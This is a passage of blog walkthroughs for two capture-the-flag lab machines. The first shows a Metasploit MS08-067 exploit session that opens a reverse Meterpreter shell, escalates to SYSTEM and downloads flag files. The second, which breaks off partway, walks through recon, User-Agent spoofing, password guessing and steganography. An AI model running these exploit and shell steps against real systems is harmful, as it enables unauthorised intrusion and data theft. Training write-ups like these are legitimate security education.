</code></pre></div></div>

<p><strong>Exploitation and Post Exploitation</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(ms06_040_netapi) &gt; use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) &gt; show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) &gt; set RHOST 10.10.10.4
RHOST =&gt; 10.10.10.4
msf exploit(ms08_067_netapi) &gt; run

[*] Started reverse TCP handler on 10.10.15.172:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (956991 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.15.172:4444 -&gt; 10.10.10.4:1028) at 2017-07-18 22:26:33 +0800

meterpreter &gt; sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter &gt; whoami
[-] Unknown command: whoami.
meterpreter &gt; getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter &gt; shell
Process 1512 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32&gt;cd c:\Users
cd c:\Users
The system cannot find the path specified.

C:\WINDOWS\system32&gt;cd C
cd C
The system cannot find the path specified.

C:\WINDOWS\system32&gt;cd C:\
cd C:\

C:\&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\

16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� &lt;DIR&gt; Documents and Settings
16/03/2017 08:33 �� &lt;DIR&gt; Program Files
16/03/2017 08:33 �� &lt;DIR&gt; WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.488.408.064 bytes free

C:\&gt;cd WINDOWS
cd WINDOWS

C:\WINDOWS&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS

16/03/2017 08:33 �� &lt;DIR&gt; .
16/03/2017 08:33 �� &lt;DIR&gt; ..
23/07/2017 07:19 �� 0 0.log
16/03/2017 08:18 �� &lt;DIR&gt; addins
16/03/2017 08:19 �� &lt;DIR&gt; AppPatch
23/08/2001 03:00 �� 1.272 Blue Lace 16.bmp
23/08/2001 03:00 �� 82.944 clock.avi
16/03/2017 08:27 �� 200 cmsetacl.log
23/08/2001 03:00 �� 17.062 Coffee Bean.bmp
16/03/2017 08:32 �� 15.905 comsetup.log
16/03/2017 08:18 �� &lt;DIR&gt; Config
16/03/2017 08:18 �� &lt;DIR&gt; Connection Wizard
16/03/2017 08:30 �� 0 control.ini
16/03/2017 08:28 �� &lt;DIR&gt; Cursors
16/03/2017 08:20 �� &lt;DIR&gt; Debug
23/08/2001 03:00 �� 2 desktop.ini
16/03/2017 08:18 �� &lt;DIR&gt; Driver Cache
16/03/2017 08:28 �� 130 DtcInstall.log
16/03/2017 08:19 �� &lt;DIR&gt; ehome
14/04/2008 06:42 �� 1.033.728 explorer.exe
23/08/2001 03:00 �� 80 explorer.scf
16/03/2017 08:29 �� 11.537 FaxSetup.log
23/08/2001 03:00 �� 16.730 FeatherTexture.bmp
23/08/2001 03:00 �� 17.336 Gone Fishing.bmp
23/08/2001 03:00 �� 26.582 Greenstone.bmp
16/03/2017 08:29 �� &lt;DIR&gt; Help
14/04/2008 06:42 �� 10.752 hh.exe
16/03/2017 08:32 �� 48.335 iis6.log
16/03/2017 08:30 �� &lt;DIR&gt; ime
16/03/2017 08:32 �� 4.382 imsins.log
16/03/2017 08:18 �� &lt;DIR&gt; java
16/03/2017 08:19 �� &lt;DIR&gt; L2Schemas
16/03/2017 08:29 �� 1.487 MedCtrOC.log
16/03/2017 08:19 �� &lt;DIR&gt; Media
16/03/2017 08:19 �� &lt;DIR&gt; msagent
16/03/2017 08:18 �� &lt;DIR&gt; msapps
23/08/2001 03:00 �� 1.405 msdfmap.ini
16/03/2017 08:29 �� 871 msgsocm.log
16/03/2017 08:28 �� 10.066 msmqinst.log
16/03/2017 08:19 �� &lt;DIR&gt; mui
16/03/2017 08:29 �� 2.790 netfxocm.log
16/03/2017 08:19 �� &lt;DIR&gt; Network Diagnostic
14/04/2008 06:42 �� 69.120 NOTEPAD.EXE
16/03/2017 08:32 �� 7.948 ntdtcsetup.log
16/03/2017 08:29 �� 14.772 ocgen.log
16/03/2017 08:32 �� 885 ocmsn.log
16/03/2017 08:30 �� 4.161 ODBCINST.INI
16/03/2017 09:07 �� 1.178 OEWABLog.txt
16/03/2017 08:29 �� &lt;DIR&gt; Offline Web Pages
16/03/2017 08:29 �� &lt;DIR&gt; pchealth
16/03/2017 08:19 �� &lt;DIR&gt; PeerNet
23/08/2001 03:00 �� 65.954 Prairie Wind.bmp
16/03/2017 09:18 �� &lt;DIR&gt; Prefetch
16/03/2017 08:18 �� &lt;DIR&gt; Provisioning
14/04/2008 06:42 �� 146.432 regedit.exe
16/03/2017 08:30 �� &lt;DIR&gt; Registration
16/03/2017 08:32 �� 8.192 REGLOCS.OLD
16/03/2017 08:24 �� 1.690 regopt.log
16/03/2017 08:18 �� &lt;DIR&gt; repair
16/03/2017 08:18 �� &lt;DIR&gt; Resources
23/08/2001 03:00 �� 17.362 Rhododendron.bmp
23/08/2001 03:00 �� 26.680 River Sumida.bmp
23/08/2001 03:00 �� 65.832 Santa Fe Stucco.bmp
11/05/2017 01:31 �� 1.306 SchedLgU.Txt
16/03/2017 08:30 �� &lt;DIR&gt; security
16/03/2017 08:29 �� 1.022 sessmgr.setup.log
14/04/2008 08:40 �� 1.296.669 SET3.tmp
14/04/2008 08:34 �� 1.088.840 SET4.tmp
14/04/2008 08:34 �� 16.535 SET8.tmp
16/03/2017 08:32 �� 159.934 setupact.log
11/05/2017 01:31 �� 196.252 setupapi.log
16/03/2017 08:20 �� 0 setuperr.log
16/03/2017 08:33 �� 747.894 setuplog.txt
23/08/2001 03:00 �� 65.978 Soap Bubbles.bmp
16/03/2017 08:33 �� &lt;DIR&gt; SoftwareDistribution
16/03/2017 08:29 �� &lt;DIR&gt; srchasst
16/03/2017 08:22 �� 0 Sti_Trace.log
16/03/2017 08:20 �� &lt;DIR&gt; system
16/03/2017 08:20 �� 231 system.ini
23/07/2017 07:23 �� &lt;DIR&gt; system32
16/03/2017 08:32 �� 1.252 tabletoc.log
23/08/2001 03:00 �� 15.360 TASKMAN.EXE
11/05/2017 01:30 �� &lt;DIR&gt; Temp
16/03/2017 08:32 �� 10.801 tsoc.log
23/08/2001 03:00 �� 94.784 twain.dll
16/03/2017 08:18 �� &lt;DIR&gt; twain_32
14/04/2008 06:42 �� 50.688 twain_32.dll
23/08/2001 03:00 �� 49.680 twunk_16.exe
23/08/2001 03:00 �� 25.600 twunk_32.exe
16/03/2017 08:28 �� 36 vb.ini
16/03/2017 08:28 �� 37 vbaddin.ini
23/08/2001 03:00 �� 18.944 vmmreg32.dll
16/03/2017 08:29 �� &lt;DIR&gt; Web
16/03/2017 08:22 �� 501 wiadebug.log
16/03/2017 08:22 �� 49 wiaservc.log
16/03/2017 08:30 �� 477 win.ini
23/07/2017 07:24 �� 11.076 WindowsUpdate.log
23/08/2001 03:00 �� 256.192 winhelp.exe
14/04/2008 06:42 �� 283.648 winhlp32.exe
16/03/2017 08:20 �� &lt;DIR&gt; WinSxS
16/03/2017 09:07 �� 1.107 wmsetup.log
16/03/2017 08:30 �� 316.640 WMSysPr9.prx
23/08/2001 03:00 �� 9.522 Zapotec.bmp
23/08/2001 03:00 �� 707 _default.pif
68 File(s) 6.455.564 bytes
36 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS&gt;dir system
dir system
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\system

16/03/2017 08:20 �� &lt;DIR&gt; .
16/03/2017 08:20 �� &lt;DIR&gt; ..
23/08/2001 03:00 �� 69.584 AVICAP.DLL
23/08/2001 03:00 �� 109.456 AVIFILE.DLL
23/08/2001 03:00 �� 32.816 COMMDLG.DLL
23/08/2001 03:00 �� 2.000 KEYBOARD.DRV
23/08/2001 03:00 �� 9.936 LZEXPAND.DLL
23/08/2001 03:00 �� 73.376 MCIAVI.DRV
23/08/2001 03:00 �� 25.264 MCISEQ.DRV
23/08/2001 03:00 �� 28.160 MCIWAVE.DRV
13/04/2008 11:24 �� 68.768 MMSYSTEM.DLL
23/08/2001 03:00 �� 1.152 MMTASK.TSK
23/08/2001 03:00 �� 2.032 MOUSE.DRV
23/08/2001 03:00 �� 126.912 MSVIDEO.DLL
23/08/2001 03:00 �� 82.944 OLECLI.DLL
23/08/2001 03:00 �� 24.064 OLESVR.DLL
23/08/2001 03:00 �� 59.167 setup.inf
23/08/2001 03:00 �� 5.120 SHELL.DLL
23/08/2001 03:00 �� 1.744 SOUND.DRV
23/08/2001 03:00 �� 5.532 stdole.tlb
23/08/2001 03:00 �� 3.360 SYSTEM.DRV
23/08/2001 03:00 �� 19.200 TAPI.DLL
23/08/2001 03:00 �� 4.048 TIMER.DRV
23/08/2001 03:00 �� 9.008 VER.DLL
23/08/2001 03:00 �� 2.176 VGA.DRV
23/08/2001 03:00 �� 13.600 WFWNET.DRV
14/04/2008 06:42 �� 146.432 WINSPOOL.DRV
25 File(s) 925.851 bytes
2 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS&gt;dir ehome
dir ehome
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\ehome

16/03/2017 08:19 �� &lt;DIR&gt; .
16/03/2017 08:19 �� &lt;DIR&gt; ..
14/04/2008 06:41 �� 33.792 custsat.dll
1 File(s) 33.792 bytes
2 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS&gt;dir temp
dir temp
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\temp

11/05/2017 01:30 �� &lt;DIR&gt; .
11/05/2017 01:30 �� &lt;DIR&gt; ..
0 File(s) 0 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\WINDOWS&gt;cd ..
cd ..

C:\&gt;cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings

16/03/2017 09:07 �� &lt;DIR&gt; .
16/03/2017 09:07 �� &lt;DIR&gt; ..
16/03/2017 09:07 �� &lt;DIR&gt; Administrator
16/03/2017 08:29 �� &lt;DIR&gt; All Users
16/03/2017 08:33 �� &lt;DIR&gt; john
0 File(s) 0 bytes
5 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings&gt;cd john
cd john

C:\Documents and Settings\john&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john

16/03/2017 08:33 �� &lt;DIR&gt; .
16/03/2017 08:33 �� &lt;DIR&gt; ..
16/03/2017 09:19 �� &lt;DIR&gt; Desktop
16/03/2017 08:33 �� &lt;DIR&gt; Favorites
16/03/2017 08:33 �� &lt;DIR&gt; My Documents
16/03/2017 08:20 �� &lt;DIR&gt; Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john&gt;cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john\Desktop

16/03/2017 09:19 �� &lt;DIR&gt; .
16/03/2017 09:19 �� &lt;DIR&gt; ..
16/03/2017 09:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john\Desktop&gt;edit user.txt
edit user.txt
^C
Terminate channel 1? [y/N] y
meterpreter &gt; pwd
C:\WINDOWS\system32
meterpreter &gt; cd C:\Documents and Settings\john\Desktop
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter &gt; cd C:
meterpreter &gt; pwd
C:\WINDOWS\system32
meterpreter &gt; lpwd
/home/kaipowered/Documents/HTB
meterpreter &gt; cd C:\
meterpreter &gt; pwd
C:\
meterpreter &gt; cd "Documents and Settings"
meterpreter &gt; pwd
C:\Documents and Settings
meterpreter &gt; cd john
meterpreter &gt; cd Desktop
meterpreter &gt; download user.txt
[*] Downloading: user.txt -&gt; user.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): user.txt -&gt; user.txt
[*] download : user.txt -&gt; user.txt
meterpreter &gt; pwd
C:\Documents and Settings\john\Desktop
meterpreter &gt; cd ..
meterpreter &gt; cd ..
meterpreter &gt; pwd
C:\Documents and Settings
meterpreter &gt; dir
Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 14:07:21 +0800 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 13:29:48 +0800 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:37 +0800 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:52 +0800 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:43 +0800 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:42 +0800 john

meterpreter &gt; cd Administrator
meterpreter &gt; dir
Listing: C:\Documents and Settings\Administrator
================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:29 +0800 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:27 +0800 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 14:18:27 +0800 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:32 +0800 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 My Documents
100666/rw-rw-rw- 524288 fil 2017-05-11 06:31:16 +0800 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-07-24 00:18:53 +0800 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:24 +0800 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 13:20:48 +0800 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 13:28:41 +0800 Templates
100666/rw-rw-rw- 178 fil 2017-05-11 06:31:16 +0800 ntuser.ini

meterpreter &gt; cd Desktop
meterpreter &gt; dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 32 fil 2017-03-16 14:18:50 +0800 root.txt

meterpreter &gt; download root.txt
[*] Downloading: root.txt -&gt; root.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): root.txt -&gt; root.txt
[*] download : root.txt -&gt; root.txt
meterpreter &gt;
</code></pre></div></div>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This post contains the actual commands that I used in hacking and getting the user and root hashes on HTB Legacy Box. Enumeration kaipowered@debian:~/Downloads/enum4linux-0.8.9/enum4linux-0.8.9$ su…]]></summary></entry><entry><title type="html">Vulnhub SkyDog 2016 – Catch Me If You Can</title><link href="https://blog.anotsodev.me/2017/08/30/vulnhub-sky-dog-2016-catch-me-if-you-can.html" rel="alternate" type="text/html" title="Vulnhub SkyDog 2016 – Catch Me If You Can" /><published>2017-08-30T00:00:00+00:00</published><updated>2017-08-30T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/08/30/vulnhub-sky-dog-2016-catch-me-if-you-can</id><content type="html" xml:base="https://blog.anotsodev.me/2017/08/30/vulnhub-sky-dog-2016-catch-me-if-you-can.html"><![CDATA[<p>The SkyDogConCTF is one of the most enjoyable CTF challenges that I have ever played because it contained a lot of twists and challenges that don’t need advanced exploitation techniques and the tools to solve these challenges were available in Kali Linux.</p>

<p>There were also hints on how to get the flags.</p>

<p><em>Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”</em></p>

<p><em>Flag#2 – “Obscurity or Security? That is the Question”</em></p>

<p><em>Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”</em></p>

<p><em>Flag#4 – “A Good Agent is Hard to Find”</em></p>

<p><em>Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”</em></p>

<p><em>Flag#6 – “Where in the World is Frank?”</em></p>

<p><em>Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”</em></p>

<p><em>Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”</em></p>

<p>So after running the netdiscover command to get the IP address of the VM, I fired up Nmap to scan the available ports.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -p- -sV -sC -oA nmapscan 192.168.56.102
 Host is up (0.00048s latency).
 Not shown: 65531 filtered ports
 PORT STATE SERVICE VERSION
 22/tcp closed ssh
 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: 400 Bad Request
 | ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
 | Not valid before: 2016-09-21T14:51:57
 |_Not valid after: 2017-09-21T14:51:57
 |_ssl-date: TLS randomness does not represent time
 22222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 | 2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
 |_ 256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Tue Aug 29 13:41:53 2017 -- 1 IP address (1 host up) scanned in 124.99 seconds
</code></pre></div></div>

<p>There were three open ports:</p>

<ul>
  <li>port 80</li>
  <li>port 443</li>
  <li>port 22222</li>
</ul>

<p>The first interesting port that I noticed was the port 22222, so I executed the ssh command.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ ssh 192.168.56.102 -p 22222
 ###############################################################
 # WARNING #
 # FBI - Authorized access only! #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 # All actions Will be monitored and recorded #
 # Flag{53c82eba31f6d416f331de9162ebe997} #
 ###############################################################
 kaipowered@192.168.56.102's password:
</code></pre></div></div>

<p>And there it was. The first flag was shown on the banner message. After getting the first flag, I cracked the given md5 hash here: http://md5online.org/</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Flag{53c82eba31f6d416f331de9162ebe997}

Decoded MD5 Hash: encrypt
</code></pre></div></div>

<p>I had no idea on how can I use the word ‘encrypt’ to get the next flag, so the next thing I did was open the web browser and open the website hosted on the VM.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-26-55.png?resize=1170%2C586&amp;ssl=1" alt="Screenshot from 2017-08-31 01-26-55" /></p>

<p>And it showed me the homepage of the SkyDogConCTF. I explored the entire website and I only found some interesting and funny testimonials of this CTF challenge.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-32-09.png?resize=814%2C516&amp;ssl=1" alt="Screenshot from 2017-08-31 01-32-09" /></p>

<p>So after viewing all the links on the website, I went back to the homepage and view the page source of the website.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-34-10.png?resize=898%2C680&amp;ssl=1" alt="Screenshot from 2017-08-31 01-34-10" /></p>

<p>And on line 40 of the source caught my attention. So I opened the source of the script on the web browser and it showed me this.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-36-17.png?resize=648%2C127&amp;ssl=1" alt="Screenshot from 2017-08-31 01-36-17" /></p>

<p>The first line of the JS file appeared that it was a hex, and the hint on the Flag #1 made sense quoting “Don’t go Home Frank! There’s a Hex on Your House”. So I went to this site http://www.rapidtables.com/convert/number/hex-to-ascii.htm and converted the hex value to ASCII and it showed me the first flag.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag{7c0132070a0ef71d542663e9dc1f5dee}

Decoded MD5 Hash: nmap
</code></pre></div></div>

<p>I guessed that the decoded hash was a hint or something but I already ran Nmap scan so the next thing I did was visit the https version of the website and view the information of the certificate.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-45-36.png?resize=1170%2C634&amp;ssl=1" alt="Screenshot from 2017-08-31 01-45-36" /></p>

<p>And there it was, the flag#3.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag3{f82366a9ddc064585d54e3f78bde3221}

Decoded MD5 Hash: personnel
</code></pre></div></div>

<p>The next hint was “personnel” and my instinct tells me that it is a directory of the web server. And I was right.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-52-18.png?resize=1170%2C293&amp;ssl=1" alt="Screenshot from 2017-08-31 01-52-18" /></p>

<p>So I checked again the hint for the next flag, which is the Flag #4 and it says that</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>“A Good Agent is Hard to Find"
</code></pre></div></div>

<p>And I can only think of one thing related to the word “Agent” and it was the “User-Agent”. But I had no idea what User-Agent should I use to open the “personnel” directory so after reading the “ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging….” message, I opened again the html5.js file and searched for “FBI”. And there, I found two interesting lines in the JS file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* maindev - 6/7/02 Adding temporary support for IE4 FBI Workstations */
 /* newmaindev - 5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */
</code></pre></div></div>

<p>I searched for the User-Agent of the IE4 and changed my User-Agent to access the “personnel” directory.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Mozilla/4.0 (compatible; MSIE 4.0; Windows 98)
</code></pre></div></div>

<p>And I got an access to the “personnel” directory.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-02-10-57.png?resize=1170%2C591&amp;ssl=1" alt="Screenshot from 2017-08-31 02-10-57" /></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag{14e10d570047667f904261e6d08f520f}

Clue = new+flag

Decoded MD5 Hash: evidence

Clue = newevidence
</code></pre></div></div>

<p>So I got the 4th flag and got the clue on how to get the next flag.</p>

<p>And it appeared that I needed to enter the username and password before I can view the content of the newevidence directory.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-02-12-54.png?resize=1170%2C583&amp;ssl=1" alt="Screenshot from 2017-08-31 02-12-54" /></p>

<p>The first thing I did was to search “Agent Hanratty” on google to see any available information about Agent Hanratty that can be used as a username.</p>

<p>So I found that the first name of Agent Hanratty is Carl and the last name is Hanratty.</p>

<p>Going back to the html5.js file, I noticed that the format of the username was firstname.lastname.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>doug.perterson@fbi.gov
</code></pre></div></div>

<p>So the username of Agent Hanratty is</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>carl.hanratty
</code></pre></div></div>

<p>I only needed the password to access the newevidence directory and based on the Flag #5 quote</p>

<p><em>The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or <strong>Personal</strong> it Goes Against Best Practices</em></p>

<p>So I searched for the person that was very close or family member of Agent Hanratty and after searching and trying all the possible passwords, I tried the name “Grace” as the password that I found on this phrase.</p>

<p><em>Workaholic Carl Hanratty loses his daughter <strong>Grace</strong> to a divorce.</em></p>

<p>And I got an access to the newevidence directory.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-02-30-10.png?resize=1170%2C599&amp;ssl=1" alt="Screenshot from 2017-08-31 02-30-10" /></p>

<p>So I downloaded the “Evidence Summary File” and the content of the file was this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag{117c240d49f54096413dd64280399ea9}

Decoded MD5 Hash: panam
</code></pre></div></div>

<p>It appeared that it was the Flag #5 and the decoded md5 hash was “panam”.</p>

<p>I tried opening “panam” on the web browser hoping that it was also a directory of the web server but there was no “panam” directory on the web server.</p>

<p>There were still two links on the page that I haven’t checked yet. So I clicked the “Possible Location” and there was an image file that can be downloaded, so I downloaded the image file.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot_from_2017_m2krw.jpg?resize=969%2C648&amp;ssl=1" alt="screenshot_from_2017_m2kRw" /></p>

<p>I tried to steghide the image to see if there were any secret messages embedded in the image file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ steghide --extract -sf image.jpg
 Enter passphrase: panam # I tried the passphrase panam that i got from the decoded md5 hash of flag #5
 the file "flag.txt" does already exist. overwrite ? (y/n) y
 wrote extracted data to "flag.txt"
</code></pre></div></div>

<p>And I guess I was right and there was a text file named “flag”. I viewed the content of the text file and showed me this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ cat flag.txt
 flag{d1e5146b171928731385eb7ea38c37b8}
 =ILoveFrance

clue=iheartbrenda
 kaipowered@debian:~/Documents/Vulnhub/skydogctf$
</code></pre></div></div>

<p>There was the flag #6, the decoded md5 hash, and a clue for the next flag. So going back to the hint for the next flag.</p>

<p><em>Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”</em></p>

<p>The quote “I’m the Fastest Man Alive!” was sounded familiar so the next thing I did was google the quote and search who said that.</p>

<p><em>My name is Barry Allen, and I am the fastest man alive.</em></p>

<p>It seemed like Barry Allen from The Flash also said the “I’m the Fastest Man Alive!”.</p>

<p>The only last thing that was left to check was the ssh service on port 22222.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>username: barryallen

password: iheartbrenda
</code></pre></div></div>

<p>With the found username and password, I used them and opened the ssh to login to the VM.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ ssh barryallen@192.168.56.102 -p 22222
 ###############################################################
 # WARNING #
 # FBI - Authorized access only! #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 # All actions Will be monitored and recorded #
 # Flag{53c82eba31f6d416f331de9162ebe997} #
 ###############################################################
 barryallen@192.168.56.102's password:
 Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

* Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

14 packages can be updated.
 7 updates are security updates.

Last login: Tue Aug 29 07:19:16 2017 from 192.168.56.1

barryallen@skydogconctf2016:~$
</code></pre></div></div>

<p>Commands</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>barryallen@skydogconctf2016:~$ ls
 flag.txt security-system.data
</code></pre></div></div>

<p>There were two files present in the user directory of barry allen.</p>

<ul>
  <li>flag.txt</li>
  <li>security-system.data</li>
</ul>

<p>The flag #7 and a zip file.</p>

<p>Here are the commands on how I got the Flag #8 and thanks to this walkthrough http://evilcsec.com/skydogcon-ctf-catch-me-if-you-can-walkthrough/ to get the final flag. I needed to see this walkthrough to get to know what tools to use to analyze the data file to get the final flag.</p>

<p>Hint for the final flag.</p>

<p>Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”</p>

<p>Commands</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>barryallen@skydogconctf2016:~$ cat flag.txt
 flag{bd2f6a1d5242c962a05619c56fa47ba6} #decoded md5 hash: theflash
 barryallen@skydogconctf2016:~$

barryallen@skydogconctf2016:~$ file security-system.data
